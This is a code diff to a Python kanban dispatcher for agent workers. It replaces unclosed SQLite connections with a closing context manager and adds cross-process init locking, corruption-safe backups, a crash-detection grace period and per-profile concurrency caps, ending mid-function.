@@ -1279,7 +1279,7 @@ def _cmd_heartbeat(args: argparse.Namespace) -> int:
def _cmd_assignees(args: argparse.Namespace) -> int:
with kb.connect() as conn:
with kb.connect_closing() as conn:
data = kb.known_assignees(conn)
if getattr(args, "json", False):
print(json.dumps(data, indent=2, ensure_ascii=False))
@@ -1320,7 +1320,7 @@ def _cmd_create(args: argparse.Namespace) -> int:
file=sys.stderr,
)
return 2
with kb.connect() as conn:
with kb.connect_closing() as conn:
task_id = kb.create_task(
conn,
title=args.title,
@@ -1369,7 +1369,7 @@ def _cmd_swarm(args: argparse.Namespace) -> int:
if not workers:
print("kanban swarm: at least one --worker is required", file=sys.stderr)
return 2
with kb.connect() as conn:
with kb.connect_closing() as conn:
created = ks.create_swarm(
conn,
goal=args.goal,
@@ -1395,7 +1395,7 @@ def _cmd_list(args: argparse.Namespace) -> int:
assignee = args.assignee
if args.mine and not assignee:
assignee = _profile_author()
with kb.connect() as conn:
with kb.connect_closing() as conn:
# Cheap "mini-dispatch": recompute ready so list output reflects
# dependencies that may have cleared since the last dispatcher tick.
kb.recompute_ready(conn)
@@ -1444,7 +1444,7 @@ def _cmd_show(args: argparse.Namespace) -> int:
file=sys.stderr,
)
return 2
with kb.connect() as conn:
with kb.connect_closing() as conn:
task = kb.get_task(conn, args.task_id)
if not task:
print(f"no such task: {args.task_id}", file=sys.stderr)
@@ -1610,7 +1610,7 @@ def _cmd_show(args: argparse.Namespace) -> int:
def _cmd_assign(args: argparse.Namespace) -> int:
profile = None if args.profile.lower() in {"none", "-", "null"} else args.profile
with kb.connect() as conn:
with kb.connect_closing() as conn:
ok = kb.assign_task(conn, args.task_id, profile)
if not ok:
print(f"no such task: {args.task_id}", file=sys.stderr)
@@ -1620,7 +1620,7 @@ def _cmd_assign(args: argparse.Namespace) -> int:
def _cmd_reclaim(args: argparse.Namespace) -> int:
with kb.connect() as conn:
with kb.connect_closing() as conn:
ok = kb.reclaim_task(
conn, args.task_id,
reason=getattr(args, "reason", None),
@@ -1637,7 +1637,7 @@ def _cmd_reclaim(args: argparse.Namespace) -> int:
def _cmd_reassign(args: argparse.Namespace) -> int:
profile = None if args.profile.lower() in {"none", "-", "null"} else args.profile
with kb.connect() as conn:
with kb.connect_closing() as conn:
ok = kb.reassign_task(
conn, args.task_id, profile,
reclaim_first=bool(getattr(args, "reclaim", False)),
@@ -1667,7 +1667,7 @@ def _cmd_diagnostics(args: argparse.Namespace) -> int:
diag_config = kd.config_from_runtime_config(load_config())
with kb.connect() as conn:
with kb.connect_closing() as conn:
# Either one-task mode or fleet mode.
if getattr(args, "task", None):
task = kb.get_task(conn, args.task)
@@ -1790,14 +1790,14 @@ def _cmd_diagnostics(args: argparse.Namespace) -> int:
def _cmd_link(args: argparse.Namespace) -> int:
with kb.connect() as conn:
with kb.connect_closing() as conn:
kb.link_tasks(conn, args.parent_id, args.child_id)
print(f"Linked {args.parent_id} -> {args.child_id}")
return 0
def _cmd_unlink(args: argparse.Namespace) -> int:
with kb.connect() as conn:
with kb.connect_closing() as conn:
ok = kb.unlink_tasks(conn, args.parent_id, args.child_id)
if not ok:
print(f"No such link: {args.parent_id} -> {args.child_id}", file=sys.stderr)
@@ -1807,7 +1807,7 @@ def _cmd_unlink(args: argparse.Namespace) -> int:
def _cmd_claim(args: argparse.Namespace) -> int:
with kb.connect() as conn:
with kb.connect_closing() as conn:
task = kb.claim_task(conn, args.task_id, ttl_seconds=args.ttl)
if task is None:
# Report why
@@ -1838,7 +1838,7 @@ def _cmd_comment(args: argparse.Namespace) -> int:
suffix = f"\n\n[trimmed to {args.max_len} chars by --max-len]"
body = body[: max(0, args.max_len - len(suffix))].rstrip() + suffix
author = args.author or _profile_author()
with kb.connect() as conn:
with kb.connect_closing() as conn:
kb.add_comment(conn, args.task_id, author, body)
print(f"Comment added to {args.task_id}")
return 0
@@ -1885,7 +1885,7 @@ def _cmd_complete(args: argparse.Namespace) -> int:
print(f"kanban: --metadata: {exc}", file=sys.stderr)
return 2
failed: list[str] = []
with kb.connect() as conn:
with kb.connect_closing() as conn:
for tid in ids:
if not kb.complete_task(
conn, tid,
@@ -1912,7 +1912,7 @@ def _cmd_edit(args: argparse.Namespace) -> int:
except (ValueError, json.JSONDecodeError) as exc:
print(f"kanban: --metadata: {exc}", file=sys.stderr)
return 2
with kb.connect() as conn:
with kb.connect_closing() as conn:
if not kb.edit_completed_task_result(
conn,
args.task_id,
@@ -1934,7 +1934,7 @@ def _cmd_block(args: argparse.Namespace) -> int:
author = _profile_author()
ids = [args.task_id] + list(getattr(args, "ids", None) or [])
failed: list[str] = []
with kb.connect() as conn:
with kb.connect_closing() as conn:
for tid in ids:
if reason:
kb.add_comment(conn, tid, author, f"BLOCKED: {reason}")
@@ -1956,7 +1956,7 @@ def _cmd_schedule(args: argparse.Namespace) -> int:
author = _profile_author()
ids = [args.task_id] + list(getattr(args, "ids", None) or [])
failed: list[str] = []
with kb.connect() as conn:
with kb.connect_closing() as conn:
for tid in ids:
if reason:
kb.add_comment(conn, tid, author, f"SCHEDULED: {reason}")
@@ -1979,7 +1979,7 @@ def _cmd_unblock(args: argparse.Namespace) -> int:
print("at least one task_id is required", file=sys.stderr)
return 1
failed: list[str] = []
with kb.connect() as conn:
with kb.connect_closing() as conn:
for tid in ids:
if not kb.unblock_task(conn, tid):
failed.append(tid)
@@ -2003,7 +2003,7 @@ def _cmd_promote(args: argparse.Namespace) -> int:
seen.add(tid)
results: list[dict[str, object]] = []
with kb.connect() as conn:
with kb.connect_closing() as conn:
for tid in ids:
ok, err = kb.promote_task(
conn,
@@ -2050,7 +2050,7 @@ def _cmd_archive(args: argparse.Namespace) -> int:
print("at least one task_id is required", file=sys.stderr)
return 1
failed: list[str] = []
with kb.connect() as conn:
with kb.connect_closing() as conn:
if purge_ids:
for tid in purge_ids:
if not kb.delete_archived_task(conn, tid):
@@ -2073,7 +2073,7 @@ def _cmd_tail(args: argparse.Namespace) -> int:
print(f"Tailing events for {args.task_id}. Ctrl-C to stop.")
try:
while True:
with kb.connect() as conn:
with kb.connect_closing() as conn:
events = kb.list_events(conn, args.task_id)
for e in events:
if e.id > last_id:
@@ -2087,12 +2087,35 @@ def _cmd_tail(args: argparse.Namespace) -> int:
def _cmd_dispatch(args: argparse.Namespace) -> int:
with kb.connect() as conn:
# Honour kanban.default_assignee as the fallback for unassigned ready
# tasks (#27145) and kanban.max_in_progress_per_profile as the
# per-profile concurrency cap (#21582). Same semantics as the
# gateway dispatch path.
try:
from hermes_cli.config import load_config
_cfg = load_config()
_kanban_cfg = _cfg.get("kanban", {}) if isinstance(_cfg, dict) else {}
default_assignee = (_kanban_cfg.get("default_assignee") or "").strip() or None
_raw_per_profile = _kanban_cfg.get("max_in_progress_per_profile", None)
try:
max_in_progress_per_profile = (
int(_raw_per_profile) if _raw_per_profile is not None else None
)
if max_in_progress_per_profile is not None and max_in_progress_per_profile < 1:
max_in_progress_per_profile = None
except (TypeError, ValueError):
max_in_progress_per_profile = None
except Exception:
default_assignee = None
max_in_progress_per_profile = None
with kb.connect_closing() as conn:
res = kb.dispatch_once(
conn,
dry_run=args.dry_run,
max_spawn=args.max,
failure_limit=getattr(args, "failure_limit", kb.DEFAULT_SPAWN_FAILURE_LIMIT),
default_assignee=default_assignee,
max_in_progress_per_profile=max_in_progress_per_profile,
)
if getattr(args, "json", False):
print(json.dumps({
@@ -2108,6 +2131,11 @@ def _cmd_dispatch(args: argparse.Namespace) -> int:
],
"skipped_unassigned": res.skipped_unassigned,
"skipped_nonspawnable": res.skipped_nonspawnable,
"skipped_per_profile_capped": [
{"task_id": tid, "assignee": who, "current": current}
for (tid, who, current) in res.skipped_per_profile_capped
],
"auto_assigned_default": res.auto_assigned_default,
}, indent=2))
return 0
print(f"Reclaimed: {res.reclaimed}")
@@ -2128,8 +2156,18 @@ def _cmd_dispatch(args: argparse.Namespace) -> int:
for tid, who, ws in res.spawned:
tag = " (dry)" if args.dry_run else ""
print(f" - {tid} -> {who} @ {ws or '-'}{tag}")
if res.auto_assigned_default:
print(
f"Auto-assigned to kanban.default_assignee={default_assignee!r}: "
f"{', '.join(res.auto_assigned_default)}"
)
if res.skipped_unassigned:
print(f"Skipped (unassigned): {', '.join(res.skipped_unassigned)}")
if res.skipped_per_profile_capped:
for tid, who, current in res.skipped_per_profile_capped:
print(
f"Deferred ({who} at per-profile cap, {current} running): {tid}"
)
if res.skipped_nonspawnable:
print(
f"Skipped (non-spawnable assignee — terminal lane, OK): "
@@ -2257,7 +2295,7 @@ def _cmd_daemon(args: argparse.Namespace) -> int:
from the dispatcher's perspective, not stuck.
"""
try:
with kb.connect() as conn:
with kb.connect_closing() as conn:
return kb.has_spawnable_ready(conn)
except Exception:
return False
@@ -2288,7 +2326,7 @@ def _cmd_watch(args: argparse.Namespace) -> int:
cursor = 0
print("Watching kanban events. Ctrl-C to stop.", flush=True)
# Seed cursor at the latest id so we don't replay history.
with kb.connect() as conn:
with kb.connect_closing() as conn:
row = conn.execute(
"SELECT COALESCE(MAX(id), 0) AS m FROM task_events"
).fetchone()
@@ -2296,7 +2334,7 @@ def _cmd_watch(args: argparse.Namespace) -> int:
try:
while True:
with kb.connect() as conn:
with kb.connect_closing() as conn:
rows = conn.execute(
"SELECT e.id, e.task_id, e.kind, e.payload, e.created_at, "
" t.assignee, t.tenant "
@@ -2329,7 +2367,7 @@ def _cmd_watch(args: argparse.Namespace) -> int:
def _cmd_stats(args: argparse.Namespace) -> int:
with kb.connect() as conn:
with kb.connect_closing() as conn:
stats = kb.board_stats(conn)
if getattr(args, "json", False):
print(json.dumps(stats, indent=2, ensure_ascii=False))
@@ -2349,7 +2387,7 @@ def _cmd_stats(args: argparse.Namespace) -> int:
def _cmd_notify_subscribe(args: argparse.Namespace) -> int:
with kb.connect() as conn:
with kb.connect_closing() as conn:
if kb.get_task(conn, args.task_id) is None:
print(f"no such task: {args.task_id}", file=sys.stderr)
return 1
@@ -2366,7 +2404,7 @@ def _cmd_notify_subscribe(args: argparse.Namespace) -> int:
def _cmd_notify_list(args: argparse.Namespace) -> int:
with kb.connect() as conn:
with kb.connect_closing() as conn:
subs = kb.list_notify_subs(conn, args.task_id)
if getattr(args, "json", False):
print(json.dumps(subs, indent=2, ensure_ascii=False))
@@ -2383,7 +2421,7 @@ def _cmd_notify_list(args: argparse.Namespace) -> int:
def _cmd_notify_unsubscribe(args: argparse.Namespace) -> int:
with kb.connect() as conn:
with kb.connect_closing() as conn:
ok = kb.remove_notify_sub(
conn, task_id=args.task_id,
platform=args.platform, chat_id=args.chat_id,
@@ -2417,7 +2455,7 @@ def _cmd_runs(args: argparse.Namespace) -> int:
file=sys.stderr,
)
return 2
with kb.connect() as conn:
with kb.connect_closing() as conn:
runs = kb.list_runs(conn, args.task_id, **rsk)
if getattr(args, "json", False):
print(json.dumps([
@@ -2456,7 +2494,7 @@ def _cmd_runs(args: argparse.Namespace) -> int:
def _cmd_context(args: argparse.Namespace) -> int:
with kb.connect() as conn:
with kb.connect_closing() as conn:
text = kb.build_worker_context(conn, args.task_id)
print(text)
return 0
@@ -2622,7 +2660,7 @@ def _cmd_gc(args: argparse.Namespace) -> int:
import shutil
scratch_root = kb.workspaces_root()
removed_ws = 0
with kb.connect() as conn:
with kb.connect_closing() as conn:
rows = conn.execute(
"SELECT id, workspace_kind, workspace_path FROM tasks WHERE status = 'archived'"
).fetchall()
@@ -2645,7 +2683,7 @@ def _cmd_gc(args: argparse.Namespace) -> int:
event_days = getattr(args, "event_retention_days", 30)
log_days = getattr(args, "log_retention_days", 30)
with kb.connect() as conn:
with kb.connect_closing() as conn:
removed_events = kb.gc_events(
conn, older_than_seconds=event_days * 24 * 3600,
)
+436 -98
View File
@@ -71,6 +71,7 @@ new locking.
from __future__ import annotations
import contextlib
import hashlib
import json
import os
import re
@@ -134,6 +135,34 @@ def _resolve_claim_ttl_seconds(ttl_seconds: Optional[int] = None) -> int:
return DEFAULT_CLAIM_TTL_SECONDS
# Grace period after a task transitions to ``running`` during which
# ``detect_crashed_workers`` skips the ``_pid_alive`` check. Covers the
# fork() → /proc-visibility window where liveness can transiently report
# False for a freshly-spawned worker. The 15-minute claim TTL still
# catches genuinely-crashed workers; this only suppresses false positives
# during the launch window.
DEFAULT_CRASH_GRACE_SECONDS = 30
def _resolve_crash_grace_seconds() -> int:
"""Return the crash-detection grace period in seconds.
Reads ``HERMES_KANBAN_CRASH_GRACE_SECONDS`` from the environment;
falls back to ``DEFAULT_CRASH_GRACE_SECONDS`` when absent, empty,
non-integer, or negative. A value of 0 restores immediate-reclaim
behaviour (useful for tests).
"""
raw = os.environ.get("HERMES_KANBAN_CRASH_GRACE_SECONDS", "").strip()
if raw:
try:
parsed = int(raw)
except ValueError:
parsed = -1
if parsed >= 0:
return parsed
return DEFAULT_CRASH_GRACE_SECONDS
# Worker-context caps so build_worker_context() stays bounded on
# pathological boards (retry-heavy tasks, comment storms, giant
# summaries). Values chosen to fit a typical 100k-char LLM prompt with
@@ -954,6 +983,89 @@ CREATE INDEX IF NOT EXISTS idx_notify_task ON kanban_notify_subs(task_
_INITIALIZED_PATHS: set[str] = set()
_INIT_LOCK = threading.RLock()
_SQLITE_HEADER = b"SQLite format 3\x00"
DEFAULT_BUSY_TIMEOUT_MS = 120_000
def _resolve_busy_timeout_ms() -> int:
"""Return the SQLite busy timeout for Kanban connections.
Kanban is the shared cross-profile dispatch bus, so worker stampedes are
expected. A long busy timeout lets SQLite serialize writers via WAL rather
than surfacing transient ``database is locked`` failures during bursts.
"""
raw = os.environ.get("HERMES_KANBAN_BUSY_TIMEOUT_MS", "").strip()
if raw:
try:
parsed = int(raw)
except ValueError:
parsed = 0
if parsed > 0:
return parsed
return DEFAULT_BUSY_TIMEOUT_MS
def _sqlite_connect(path: Path) -> sqlite3.Connection:
"""Open a Kanban SQLite connection with consistent lock waiting."""
busy_timeout_ms = _resolve_busy_timeout_ms()
conn = sqlite3.connect(
str(path),
isolation_level=None,
timeout=busy_timeout_ms / 1000.0,
)
# ``sqlite3.connect(timeout=...)`` normally maps to busy_timeout, but set
# the PRAGMA explicitly so it is observable and survives future wrapper
# changes. Parameter binding is not supported for PRAGMA assignments.
conn.execute(f"PRAGMA busy_timeout={busy_timeout_ms}")
return conn
@contextlib.contextmanager
def _cross_process_init_lock(path: Path):
"""Serialize first-connect WAL/schema/integrity setup across processes.
``_INIT_LOCK`` only protects threads inside one Python process. During a
dispatcher burst, many worker processes can all hit a fresh/legacy board at
once and each process has an empty ``_INITIALIZED_PATHS`` cache. This file
lock keeps header validation, integrity probing, WAL activation, and
additive migrations single-file/single-writer across the whole host while
leaving normal post-init DB usage concurrent under SQLite WAL.
"""
path.parent.mkdir(parents=True, exist_ok=True)
lock_path = path.with_name(path.name + ".init.lock")
handle = lock_path.open("a+b")
try:
if _IS_WINDOWS:
import msvcrt
# Lock a single byte in the sidecar file. ``msvcrt.locking`` starts
# at the current file position, so seek explicitly before both
# lock and unlock. The file is opened in append/read binary mode so
# it always exists but the byte-range lock is the synchronization
# primitive; no payload needs to be written.
handle.seek(0)
locking = getattr(msvcrt, "locking")
lock_mode = getattr(msvcrt, "LK_LOCK")
locking(handle.fileno(), lock_mode, 1)
else:
import fcntl
fcntl.flock(handle.fileno(), fcntl.LOCK_EX)
yield
finally:
try:
if _IS_WINDOWS:
import msvcrt
handle.seek(0)
locking = getattr(msvcrt, "locking")
unlock_mode = getattr(msvcrt, "LK_UNLCK")
locking(handle.fileno(), unlock_mode, 1)
else:
import fcntl
fcntl.flock(handle.fileno(), fcntl.LOCK_UN)
finally:
handle.close()
def _looks_like_tls_record_at(data: bytes, offset: int) -> bool:
@@ -1027,14 +1139,21 @@ class KanbanDbCorruptError(RuntimeError):
def _backup_corrupt_db(path: Path) -> Optional[Path]:
"""Copy a corrupt DB (and its WAL/SHM sidecars) to a timestamped backup.
"""Copy a corrupt DB (and its WAL/SHM sidecars) to a content-addressed backup.
The backup filename is deterministic in the main DB's sha256, so repeated
quarantines of the same corrupt bytes (gateway restarts, dispatcher retries,
multi-profile fleets all hitting the same shared DB) reuse one backup
instead of amplifying disk usage by N. If the corrupt bytes actually
change between attempts e.g. a partial repair or further damage the
fingerprint changes and a separate backup is preserved.
Returns the backup path of the main DB file, or ``None`` if the copy
itself failed (the caller still raises loudly in that case).
Writes are confined to the original DB's parent directory. The
backup basename is derived purely from ``path.name``, never from
caller-supplied directory segments no traversal is possible.
Writes are confined to the original DB's parent directory. The backup
basename is derived purely from ``path.name`` and a content hash, never
from caller-supplied directory segments no traversal is possible.
"""
# Resolve once and pin the parent so subsequent path operations cannot
# escape it. ``Path.resolve()`` collapses any ``..`` segments and
@@ -1042,32 +1161,31 @@ def _backup_corrupt_db(path: Path) -> Optional[Path]:
resolved = path.resolve()
parent = resolved.parent
base_name = resolved.name # basename only
stamp = datetime.now().strftime("%Y%m%d_%H%M%S")
candidate = parent / f"{base_name}.corrupt.{stamp}.bak"
# Defensive: candidate must still be inside parent after construction.
# f-string interpolation of ``base_name`` cannot escape ``parent``
# because ``base_name`` is itself a resolved basename, but assert it
# anyway so static analyzers can see the containment guarantee.
if candidate.parent != parent:
return None
counter = 0
while candidate.exists():
counter += 1
candidate = parent / f"{base_name}.corrupt.{stamp}.{counter}.bak"
if candidate.parent != parent:
return None
digest = hashlib.sha256()
try:
shutil.copy2(resolved, candidate)
with resolved.open("rb") as handle:
for chunk in iter(lambda: handle.read(1024 * 1024), b""):
digest.update(chunk)
except OSError:
return None
token = digest.hexdigest()[:16]
candidate = parent / f"{base_name}.corrupt.{token}.bak"
# Defensive: candidate must still be inside parent after construction.
if candidate.parent != parent:
return None
if not candidate.exists():
try:
shutil.copy2(resolved, candidate)
except OSError:
return None
for suffix in ("-wal", "-shm"):
sidecar = parent / (base_name + suffix)
if sidecar.parent != parent or not sidecar.exists():
continue
sidecar_backup = parent / (candidate.name + suffix)
if sidecar_backup.parent != parent or sidecar_backup.exists():
continue
try:
sidecar_backup = parent / (candidate.name + suffix)
if sidecar_backup.parent != parent:
continue
shutil.copy2(sidecar, sidecar_backup)
except OSError:
pass
@@ -1114,7 +1232,7 @@ def _guard_existing_db_is_healthy(path: Path) -> None:
return
reason: Optional[str] = None
try:
probe = sqlite3.connect(str(resolved), timeout=5, isolation_level=None)
probe = _sqlite_connect(resolved)
try:
row = probe.execute("PRAGMA integrity_check").fetchone()
finally:
@@ -1160,45 +1278,90 @@ def connect(
else:
path = kanban_db_path(board=board)
path.parent.mkdir(parents=True, exist_ok=True)
# Cheap byte-level check first — catches the #29507 TLS-overwrite shape
# and other invalid-header cases without opening a sqlite connection.
_validate_sqlite_header(path)
# Full integrity probe — catches corruption past the header (malformed
# pages, broken internal metadata). Cached per-path after first success
# via _INITIALIZED_PATHS so it only runs once per process per path.
_guard_existing_db_is_healthy(path)
resolved = str(path.resolve())
conn = sqlite3.connect(str(path), isolation_level=None, timeout=30)
try:
conn.row_factory = sqlite3.Row
with _INIT_LOCK:
# WAL activation can take an exclusive lock while SQLite creates the
# sidecar files for a fresh database. Keep it in the same process-local
# critical section as schema initialization so concurrent gateway
# startup threads do not race before _INITIALIZED_PATHS is populated.
# WAL doesn't work on network filesystems (NFS/SMB/FUSE). Shared helper
# falls back to DELETE with one WARNING so kanban stays usable there.
# See hermes_state._WAL_INCOMPAT_MARKERS for detection logic.
from hermes_state import apply_wal_with_fallback
apply_wal_with_fallback(conn, db_label=f"kanban.db ({path.name})")
conn.execute("PRAGMA synchronous=NORMAL")
conn.execute("PRAGMA foreign_keys=ON")
needs_init = resolved not in _INITIALIZED_PATHS
if needs_init:
# Idempotent: runs CREATE TABLE IF NOT EXISTS + the additive
# migrations. Cached so subsequent connect() calls in the same
# process are cheap. The lock prevents same-process dispatcher
# threads from racing through the additive ALTER TABLE pass with
# stale PRAGMA snapshots during gateway startup.
conn.executescript(SCHEMA_SQL)
_migrate_add_optional_columns(conn)
_INITIALIZED_PATHS.add(resolved)
except Exception:
conn.close()
raise
with _cross_process_init_lock(path):
# Cheap byte-level check first — catches the #29507 TLS-overwrite shape
# and other invalid-header cases without opening a sqlite connection.
_validate_sqlite_header(path)
# Full integrity probe — catches corruption past the header (malformed
# pages, broken internal metadata). Cached per-path after first success
# via _INITIALIZED_PATHS so it only runs once per process per path.
_guard_existing_db_is_healthy(path)
resolved = str(path.resolve())
conn = _sqlite_connect(path)
try:
conn.row_factory = sqlite3.Row
with _INIT_LOCK:
# WAL activation can take an exclusive lock while SQLite creates the
# sidecar files for a fresh database. Keep it in the same process-local
# critical section as schema initialization so concurrent gateway
# startup threads do not race before _INITIALIZED_PATHS is populated.
# WAL doesn't work on network filesystems (NFS/SMB/FUSE). Shared helper
# falls back to DELETE with one WARNING so kanban stays usable there.
# See hermes_state._WAL_INCOMPAT_MARKERS for detection logic.
from hermes_state import apply_wal_with_fallback
apply_wal_with_fallback(conn, db_label=f"kanban.db ({path.name})")
# FULL (was NORMAL): fsync before each checkpoint to narrow the
# crash window that can leave a b-tree page header torn.
conn.execute("PRAGMA synchronous=FULL")
conn.execute("PRAGMA wal_autocheckpoint=100")
conn.execute("PRAGMA foreign_keys=ON")
# Zero freed pages so a later torn write cannot expose stale
# cell content; persisted in the DB header for new DBs.
conn.execute("PRAGMA secure_delete=ON")
# Surface corrupt cells as read errors instead of silent
# wrong-data returns.
conn.execute("PRAGMA cell_size_check=ON")
needs_init = resolved not in _INITIALIZED_PATHS
if needs_init:
# Idempotent: runs CREATE TABLE IF NOT EXISTS + the additive
# migrations. Cached so subsequent connect() calls in the same
# process are cheap. The lock prevents same-process dispatcher
# threads from racing through the additive ALTER TABLE pass with
# stale PRAGMA snapshots during gateway startup.
conn.executescript(SCHEMA_SQL)
_migrate_add_optional_columns(conn)
_INITIALIZED_PATHS.add(resolved)
except Exception:
conn.close()
raise
return conn
@contextlib.contextmanager
def connect_closing(
db_path: Optional[Path] = None,
*,
board: Optional[str] = None,
):
"""Open a kanban DB connection and guarantee it is closed on exit.
Use this instead of ``with kb.connect() as conn:`` sqlite3's
built-in connection context manager only commits/rollbacks the
transaction; it does NOT close the file descriptor. In long-lived
processes (gateway, dashboard) that route every kanban operation
through ``connect()`` (e.g. ``run_slash`` dispatching ``/kanban ``
commands, ``decompose_task_endpoint`` calling
``kanban_decompose.decompose_task``), the unclosed connections
accumulate as open FDs to ``kanban.db`` and ``kanban.db-wal``. After
enough operations the process hits the kernel FD limit and dies
with ``[Errno 24] Too many open files``.
See #33159 for the production incident.
The ``connect()`` function itself remains unchanged so callers that
intentionally manage the connection lifetime (tests, long-lived
callers) continue to work.
"""
conn = connect(db_path=db_path, board=board)
try:
yield conn
finally:
try:
conn.close()
except Exception:
pass
def init_db(
db_path: Optional[Path] = None,
*,
@@ -1466,6 +1629,45 @@ def _migrate_add_optional_columns(conn: sqlite3.Connection) -> None:
)
def _check_file_length_invariant(conn: sqlite3.Connection) -> None:
"""Read the SQLite header page_count and compare against actual file size.
Raises sqlite3.DatabaseError if the file is shorter than the header claims
(torn-extend corruption).
"""
try:
row = conn.execute("PRAGMA database_list").fetchone()
if row is None:
return
path_str = row[2] # column 2 is the file path; empty for in-memory DBs
if not path_str:
return # in-memory or unnamed DB; skip
path = path_str
page_size = conn.execute("PRAGMA page_size").fetchone()[0]
file_size = os.path.getsize(path)
with open(path, "rb") as f:
f.seek(28)
header_bytes = f.read(4)
if len(header_bytes) < 4:
return # can't read header; skip
header_page_count = int.from_bytes(header_bytes, "big")
if header_page_count == 0:
return # new/empty DB; skip
actual_pages = file_size // page_size
if actual_pages < header_page_count:
raise sqlite3.DatabaseError(
f"torn-extend detected: page count mismatch on {path}: "
f"header claims {header_page_count} pages, "
f"file has {actual_pages} pages "
f"(missing {header_page_count - actual_pages} pages, "
f"file_size={file_size}, page_size={page_size})"
)
except sqlite3.DatabaseError:
raise
except Exception:
pass # I/O errors during check are non-fatal; let normal ops continue
@contextlib.contextmanager
def write_txn(conn: sqlite3.Connection):
"""Context manager for an IMMEDIATE write transaction.
@@ -1473,15 +1675,28 @@ def write_txn(conn: sqlite3.Connection):
Use for any multi-statement write (creating a task + link, claiming a
task + recording an event, etc.). A claim CAS inside this context is
atomic -- at most one concurrent writer can succeed.
The explicit ROLLBACK on exception is wrapped in try/except so that
a SQLite auto-rollback (which leaves no active transaction) does not
shadow the original exception with a spurious rollback error.
"""
conn.execute("BEGIN IMMEDIATE")
try:
yield conn
except Exception:
conn.execute("ROLLBACK")
try:
conn.execute("ROLLBACK")
except sqlite3.OperationalError:
# SQLite has already auto-rolled-back the transaction (typical
# under EIO, lock contention, or corruption). Nothing to undo;
# do not let this secondary failure shadow the real one.
pass
raise
else:
conn.execute("COMMIT")
# Post-commit file-length check: header page_count must match actual file pages.
# A discrepancy means a torn-extend — raise now rather than silently corrupt.
_check_file_length_invariant(conn)
# ---------------------------------------------------------------------------
@@ -4074,6 +4289,12 @@ class DispatchResult:
skipped_unassigned: list[str] = field(default_factory=list)
"""Ready task ids skipped because they have no assignee at all.
Operator-actionable usually a misfiled task waiting for routing."""
auto_assigned_default: list[str] = field(default_factory=list)
"""Task ids that were unassigned in the DB and had
``kanban.default_assignee`` applied this tick before spawning (#27145).
Surfaces the auto-assignment to telemetry / CLI / dashboard so the
operator can see when the dispatcher is acting on the fallback rule
rather than on explicit per-task assignments."""
skipped_nonspawnable: list[str] = field(default_factory=list)
"""Ready task ids skipped because their assignee names a control-plane
lane (a Claude Code terminal like ``orion-cc``) rather than a Hermes
@@ -4081,6 +4302,14 @@ class DispatchResult:
operator-actionable failure. Tracked separately so health telemetry
can distinguish "real stuck" (nothing spawned but spawnable work
available) from "correctly idle" (nothing spawnable in the queue)."""
skipped_per_profile_capped: list[tuple[str, str, int]] = field(default_factory=list)
"""Tasks deferred this tick because their assignee is already at
``kanban.max_in_progress_per_profile`` (#21582). Each entry is
``(task_id, assignee, current_running_count)``. NOT an
operator-actionable failure the task will be picked up on a
subsequent tick when the assignee has capacity. Separate bucket so
telemetry / dashboards can show "this profile is busy" vs
"task is genuinely stuck"."""
crashed: list[str] = field(default_factory=list)
"""Task ids reclaimed because their worker PID disappeared."""
auto_blocked: list[str] = field(default_factory=list)
@@ -4169,6 +4398,29 @@ def _classify_worker_exit(pid: int) -> "tuple[str, Optional[int]]":
return ("unknown", None)
def reap_worker_zombies() -> "list[int]":
"""Reap all zombie children of this process without blocking.
Returns the list of reaped PIDs. Safe to call when there are no
children (returns []). No-op on Windows.
"""
reaped: "list[int]" = []
if os.name != "nt":
try:
while True:
try:
pid, status = os.waitpid(-1, os.WNOHANG)
except ChildProcessError:
break
if pid == 0:
break
_record_worker_exit(pid, status)
reaped.append(pid)
except Exception:
pass
return reaped
def _pid_alive(pid: Optional[int]) -> bool:
"""Return True if ``pid`` is still running on this host.
@@ -4635,7 +4887,7 @@ def detect_crashed_workers(conn: sqlite3.Connection) -> list[str]:
# (task_id, pid, claimer, protocol_violation, error_text)
with write_txn(conn):
rows = conn.execute(
"SELECT id, worker_pid, claim_lock FROM tasks "
"SELECT id, worker_pid, claim_lock, started_at FROM tasks "
"WHERE status = 'running' AND worker_pid IS NOT NULL"
).fetchall()
host_prefix = f"{_claimer_id().split(':', 1)[0]}:"
@@ -4644,6 +4896,14 @@ def detect_crashed_workers(conn: sqlite3.Connection) -> list[str]:
lock = row["claim_lock"] or ""
if not lock.startswith(host_prefix):
continue
# Skip liveness check inside the launch-window grace period
# so a freshly-spawned worker isn't reclaimed before its PID
# is visible on /proc.
started_at = row["started_at"] if "started_at" in row.keys() else None
if started_at is not None:
grace = _resolve_crash_grace_seconds()
if time.time() - started_at < grace:
continue
if _pid_alive(row["worker_pid"]):
continue
@@ -5096,6 +5356,8 @@ def dispatch_once(
failure_limit: int = DEFAULT_SPAWN_FAILURE_LIMIT,
stale_timeout_seconds: int = 0,
board: Optional[str] = None,
default_assignee: Optional[str] = None,
max_in_progress_per_profile: Optional[int] = None,
) -> DispatchResult:
"""Run one dispatcher tick.
@@ -5125,38 +5387,9 @@ def dispatch_once(
``board`` pins workspace/log/db resolution for this tick to a specific
board. When omitted, the current-board resolution chain is used.
"""
# Reap zombie children from previously spawned workers.
# The gateway-embedded dispatcher is the parent of every worker spawned
# via _default_spawn (start_new_session=True only detaches the
# controlling tty, not the parent). Without an explicit waitpid, each
# completed worker becomes a <defunct> entry that lingers until gateway
# exit. WNOHANG keeps this non-blocking; ChildProcessError means no
# children to reap. Bounded: at most one tick's worth of completions
# can be in <defunct> at once.
#
# We also record the exit status keyed by pid, so
# ``detect_crashed_workers`` can distinguish a worker that exited
# cleanly without calling ``kanban_complete`` / ``kanban_block``
# (protocol violation — auto-block) from a real crash (OOM killer,
# SIGKILL, non-zero exit — existing counter behavior).
#
# Windows has no zombies / no os.WNOHANG — subprocess.Popen handles
# are freed when the Python object is garbage-collected or .wait() is
# called explicitly. The kanban dispatcher discards the Popen handle
# after spawn (``_default_spawn`` → abandon), so on Windows there's
# nothing to reap here — skip the whole block.
if os.name != "nt":
try:
while True:
try:
_pid, _status = os.waitpid(-1, os.WNOHANG)
except ChildProcessError:
break
if _pid == 0:
break
_record_worker_exit(_pid, _status)
except Exception:
pass
# Reap zombie children from previously spawned workers. See
# reap_worker_zombies() for the full rationale.
reap_worker_zombies()
result = DispatchResult()
result.reclaimed = release_stale_claims(conn)
@@ -5210,12 +5443,89 @@ def dispatch_once(
if max_spawn is None or max_spawn > remaining:
max_spawn = remaining
spawned = 0
# Per-profile concurrency cap (#21582): when set, track how many
# workers each assignee already has in flight, and refuse to spawn
# when this would push that assignee past the cap. Prevents
# fan-out workloads from melting a single profile's local model /
# API quota / browser pool while leaving other profiles idle.
